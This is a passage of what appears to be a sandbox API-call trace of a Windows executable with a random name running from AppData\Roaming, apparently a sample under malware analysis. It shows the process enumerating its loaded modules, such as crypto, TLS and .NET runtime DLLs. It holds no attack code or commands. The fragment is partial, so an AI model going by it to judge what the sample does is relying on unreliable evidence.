"c:\\windows\\syswow64\\dnsapi.dll")) returned 0x1e [0142.184] CoTaskMemFree (pv=0x55ab38) [0142.184] GetModuleInformation (in: hProcess=0x2a0, hModule=0x713f0000, lpmodinfo=0x24541b0, cb=0xc | out: lpmodinfo=0x24541b0*(lpBaseOfDll=0x713f0000, SizeOfImage=0x8000, EntryPoint=0x713f1fc0)) returned 1 [0142.185] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.185] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x713f0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0142.186] CoTaskMemFree (pv=0x55ab38) [0142.186] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.186] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x713f0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\WINNSI.DLL" (normalized: "c:\\windows\\syswow64\\winnsi.dll")) returned 0x1e [0142.188] CoTaskMemFree (pv=0x55ab38) [0142.188] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6fa30000, lpmodinfo=0x24562bc, cb=0xc | out: lpmodinfo=0x24562bc*(lpBaseOfDll=0x6fa30000, SizeOfImage=0x8000, EntryPoint=0x6fa31920)) returned 1 [0142.189] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.189] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6fa30000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0142.190] CoTaskMemFree (pv=0x55ab38) [0142.190] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.190] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6fa30000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")) returned 0x20 [0142.191] CoTaskMemFree (pv=0x55ab38) [0142.192] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f9e0000, lpmodinfo=0x24583d0, cb=0xc | out: lpmodinfo=0x24583d0*(lpBaseOfDll=0x6f9e0000, SizeOfImage=0x47000, EntryPoint=0x6f9f58d0)) returned 1 [0142.193] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.193] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f9e0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0142.194] CoTaskMemFree (pv=0x55ab38) [0142.194] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.194] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f9e0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\fwpuclnt.dll" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")) returned 0x20 [0142.195] CoTaskMemFree (pv=0x55ab38) [0142.195] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71540000, lpmodinfo=0x245a4e4, cb=0xc | out: lpmodinfo=0x245a4e4*(lpBaseOfDll=0x71540000, SizeOfImage=0x1b000, EntryPoint=0x71549050)) returned 1 [0142.196] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.196] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71540000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0142.210] CoTaskMemFree (pv=0x55ab38) [0142.210] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.210] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71540000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0142.212] CoTaskMemFree (pv=0x55ab38) [0142.212] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6fdf0000, lpmodinfo=0x245c5f0, cb=0xc | out: lpmodinfo=0x245c5f0*(lpBaseOfDll=0x6fdf0000, SizeOfImage=0xa000, EntryPoint=0x6fdf3200)) returned 1 [0142.215] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.215] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6fdf0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0142.216] CoTaskMemFree (pv=0x55ab38) [0142.216] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.216] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6fdf0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll")) returned 0x1f [0142.217] CoTaskMemFree (pv=0x55ab38) [0142.217] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f970000, lpmodinfo=0x245e6fc, cb=0xc | out: lpmodinfo=0x245e6fc*(lpBaseOfDll=0x6f970000, SizeOfImage=0x64000, EntryPoint=0x6f98afd0)) returned 1 [0142.218] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.218] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f970000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="schannel.dll") returned 0xc [0142.219] CoTaskMemFree (pv=0x55ab38) [0142.219] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.220] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f970000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll")) returned 0x20 [0142.221] CoTaskMemFree (pv=0x55ab38) [0142.221] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f90000, lpmodinfo=0x2460810, cb=0xc | out: lpmodinfo=0x2460810*(lpBaseOfDll=0x73f90000, SizeOfImage=0x178000, EntryPoint=0x73fe8a90)) returned 1 [0142.222] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.222] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f90000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0142.223] CoTaskMemFree (pv=0x55ab38) [0142.224] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.224] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f90000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPT32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")) returned 0x1f [0142.225] CoTaskMemFree (pv=0x55ab38) [0142.225] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764c0000, lpmodinfo=0x246291c, cb=0xc | out: lpmodinfo=0x246291c*(lpBaseOfDll=0x764c0000, SizeOfImage=0xe000, EntryPoint=0x764c5410)) returned 1 [0142.226] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.226] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764c0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0142.227] CoTaskMemFree (pv=0x55ab38) [0142.228] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.228] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764c0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSASN1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")) returned 0x1e [0142.229] CoTaskMemFree (pv=0x55ab38) [0142.229] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f960000, lpmodinfo=0x2464a28, cb=0xc | out: lpmodinfo=0x2464a28*(lpBaseOfDll=0x6f960000, SizeOfImage=0x10000, EntryPoint=0x6f964600)) returned 1 [0142.230] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.230] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f960000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="mskeyprotect.dll") returned 0x10 [0142.232] CoTaskMemFree (pv=0x55ab38) [0142.232] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.232] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f960000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll")) returned 0x24 [0142.233] CoTaskMemFree (pv=0x55ab38) [0142.233] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f940000, lpmodinfo=0x2466d58, cb=0xc | out: lpmodinfo=0x2466d58*(lpBaseOfDll=0x6f940000, SizeOfImage=0x20000, EntryPoint=0x6f94d120)) returned 1 [0142.234] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.234] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f940000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ncrypt.dll") returned 0xa [0142.236] CoTaskMemFree (pv=0x55ab38) [0142.236] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.236] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f940000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll")) returned 0x1e [0142.237] CoTaskMemFree (pv=0x55ab38) [0142.237] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f910000, lpmodinfo=0x2468e64, cb=0xc | out: lpmodinfo=0x2468e64*(lpBaseOfDll=0x6f910000, SizeOfImage=0x2c000, EntryPoint=0x6f92bb10)) returned 1 [0142.238] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.238] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f910000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="NTASN1.dll") returned 0xa [0142.240] CoTaskMemFree (pv=0x55ab38) [0142.240] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.240] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f910000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NTASN1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll")) returned 0x1e [0142.241] CoTaskMemFree (pv=0x55ab38) [0142.241] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f8f0000, lpmodinfo=0x246af70, cb=0xc | out: lpmodinfo=0x246af70*(lpBaseOfDll=0x6f8f0000, SizeOfImage=0x1a000, EntryPoint=0x6f8ffa70)) returned 1 [0142.242] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.242] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ncryptsslp.dll") returned 0xe [0142.244] CoTaskMemFree (pv=0x55ab38) [0142.244] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.244] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll")) returned 0x22 [0142.249] CoTaskMemFree (pv=0x55ab38) [0142.249] CloseHandle (hObject=0x2a0) returned 1 [0142.274] GetCurrentProcessId () returned 0xbb4 [0142.274] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbb4) returned 0x2a0 [0142.275] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x24f111c, cb=0x100, lpcbNeeded=0x19e600 | out: lphModule=0x24f111c, lpcbNeeded=0x19e600) returned 1 [0142.276] EnumProcessModules (in: hProcess=0x2a0, lphModule=0x24f1228, cb=0x200, lpcbNeeded=0x19e600 | out: lphModule=0x24f1228, lpcbNeeded=0x19e600) returned 1 [0142.277] GetModuleInformation (in: hProcess=0x2a0, hModule=0x400000, lpmodinfo=0x24f1468, cb=0xc | out: lpmodinfo=0x24f1468*(lpBaseOfDll=0x400000, SizeOfImage=0x8000, EntryPoint=0x0)) returned 1 [0142.278] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.278] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x400000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe") returned 0x3a [0142.278] CoTaskMemFree (pv=0x55ab38) [0142.278] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.278] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x400000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe")) returned 0x60 [0142.279] CoTaskMemFree (pv=0x55ab38) [0142.279] GetModuleInformation (in: hProcess=0x2a0, hModule=0x771d0000, lpmodinfo=0x24f3674, cb=0xc | out: lpmodinfo=0x24f3674*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0142.279] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.279] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x771d0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0142.279] CoTaskMemFree (pv=0x55ab38) [0142.279] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.279] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x771d0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0142.279] CoTaskMemFree (pv=0x55ab38) [0142.279] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f850000, lpmodinfo=0x24f5778, cb=0xc | out: lpmodinfo=0x24f5778*(lpBaseOfDll=0x6f850000, SizeOfImage=0x59000, EntryPoint=0x6f860780)) returned 1 [0142.280] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.280] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f850000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0142.280] CoTaskMemFree (pv=0x55ab38) [0142.280] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.280] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f850000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0142.280] CoTaskMemFree (pv=0x55ab38) [0142.280] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76720000, lpmodinfo=0x24f7884, cb=0xc | out: lpmodinfo=0x24f7884*(lpBaseOfDll=0x76720000, SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0142.281] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.281] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76720000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0142.281] CoTaskMemFree (pv=0x55ab38) [0142.281] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.281] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76720000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0142.281] CoTaskMemFree (pv=0x55ab38) [0142.281] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76910000, lpmodinfo=0x24f9998, cb=0xc | out: lpmodinfo=0x24f9998*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0142.281] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.281] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76910000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0142.282] CoTaskMemFree (pv=0x55ab38) [0142.282] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.282] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76910000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0142.282] CoTaskMemFree (pv=0x55ab38) [0142.282] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73e50000, lpmodinfo=0x24fbae0, cb=0xc | out: lpmodinfo=0x24fbae0*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0142.282] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.282] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73e50000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0142.283] CoTaskMemFree (pv=0x55ab38) [0142.283] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.283] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73e50000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0142.283] CoTaskMemFree (pv=0x55ab38) [0142.283] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76600000, lpmodinfo=0x24fdbec, cb=0xc | out: lpmodinfo=0x24fdbec*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0142.284] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.284] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76600000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0142.284] CoTaskMemFree (pv=0x55ab38) [0142.284] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.284] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76600000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0142.284] CoTaskMemFree (pv=0x55ab38) [0142.284] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76a90000, lpmodinfo=0x24ffd00, cb=0xc | out: lpmodinfo=0x24ffd00*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0142.285] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.285] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76a90000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0142.285] CoTaskMemFree (pv=0x55ab38) [0142.285] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.285] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76a90000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0142.286] CoTaskMemFree (pv=0x55ab38) [0142.286] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76cb0000, lpmodinfo=0x2501e0c, cb=0xc | out: lpmodinfo=0x2501e0c*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0142.287] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.287] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76cb0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0142.287] CoTaskMemFree (pv=0x55ab38) [0142.287] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.287] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76cb0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0142.288] CoTaskMemFree (pv=0x55ab38) [0142.288] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76c00000, lpmodinfo=0x2503f64, cb=0xc | out: lpmodinfo=0x2503f64*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0142.288] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.288] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76c00000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0142.289] CoTaskMemFree (pv=0x55ab38) [0142.289] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.289] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76c00000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0142.290] CoTaskMemFree (pv=0x55ab38) [0142.290] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f00000, lpmodinfo=0x2506070, cb=0xc | out: lpmodinfo=0x2506070*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0142.290] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.290] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f00000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0142.290] CoTaskMemFree (pv=0x55ab38) [0142.290] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.290] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f00000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0142.295] CoTaskMemFree (pv=0x55ab38) [0142.295] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73ef0000, lpmodinfo=0x250817c, cb=0xc | out: lpmodinfo=0x250817c*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0142.295] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.295] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73ef0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0142.295] CoTaskMemFree (pv=0x55ab38) [0142.295] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.295] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73ef0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0142.296] CoTaskMemFree (pv=0x55ab38) [0142.296] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76840000, lpmodinfo=0x250a290, cb=0xc | out: lpmodinfo=0x250a290*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0142.296] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.297] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76840000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0142.297] CoTaskMemFree (pv=0x55ab38) [0142.297] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.297] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76840000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0142.298] CoTaskMemFree (pv=0x55ab38) [0142.298] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6c430000, lpmodinfo=0x250c3c4, cb=0xc | out: lpmodinfo=0x250c3c4*(lpBaseOfDll=0x6c430000, SizeOfImage=0x7d000, EntryPoint=0x6c440db0)) returned 1 [0142.298] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.298] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6c430000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0142.298] CoTaskMemFree (pv=0x55ab38) [0142.299] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.299] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6c430000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0142.299] CoTaskMemFree (pv=0x55ab38) [0142.299] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d00000, lpmodinfo=0x250e50c, cb=0xc | out: lpmodinfo=0x250e50c*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0142.300] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.300] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d00000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0142.300] CoTaskMemFree (pv=0x55ab38) [0142.300] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.300] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d00000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0142.301] CoTaskMemFree (pv=0x55ab38) [0142.301] GetModuleInformation (in: hProcess=0x2a0, hModule=0x762b0000, lpmodinfo=0x2510618, cb=0xc | out: lpmodinfo=0x2510618*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0142.301] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.301] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x762b0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0142.302] CoTaskMemFree (pv=0x55ab38) [0142.302] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.302] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x762b0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0142.303] CoTaskMemFree (pv=0x55ab38) [0142.303] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74ab0000, lpmodinfo=0x2512724, cb=0xc | out: lpmodinfo=0x2512724*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0142.304] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.304] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74ab0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0142.304] CoTaskMemFree (pv=0x55ab38) [0142.304] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.304] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74ab0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0142.305] CoTaskMemFree (pv=0x55ab38) [0142.305] GetModuleInformation (in: hProcess=0x2a0, hModule=0x743d0000, lpmodinfo=0x25148b4, cb=0xc | out: lpmodinfo=0x25148b4*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 [0142.305] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.305] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x743d0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0142.306] CoTaskMemFree (pv=0x55ab38) [0142.306] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0142.306] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x743d0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0142.307] CoTaskMemFree (pv=0x55ab38) [0142.307] GetModuleInformation (in: hProcess=0x2a0, hModule=0x741b0000, lpmodinfo=0x25169c0, cb=0xc | out: lpmodinfo=0x25169c0*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 